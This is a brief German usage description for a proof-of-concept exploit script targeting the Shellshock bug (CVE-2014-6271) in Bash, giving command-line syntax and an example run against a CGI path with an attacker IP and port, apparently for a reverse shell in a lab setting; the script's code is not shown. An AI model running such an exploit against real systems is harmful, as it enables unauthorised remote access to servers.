
Proof of Concept zur Ausnutzung der Shellshock-Sicherheitslücke (CVE-2014-6271).
Dieser Exploit nutzt die Shellshock-Sicherheitslücke (CVE-2014-6271) in Bash von Version 1.14 bis 4.3 aus.
python3 ./exploit.py -t <target-ip:str> -u <uri:str> -a <attacker-ip:str> -p <port:int>
Beispiel:
python3 ./exploit.py -t 10.10.10.15 -u /cgi-bin/vulnerable -a 10.10.10.7 -p 4443
Weitere Informationen zur Sicherheitslücke:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-6271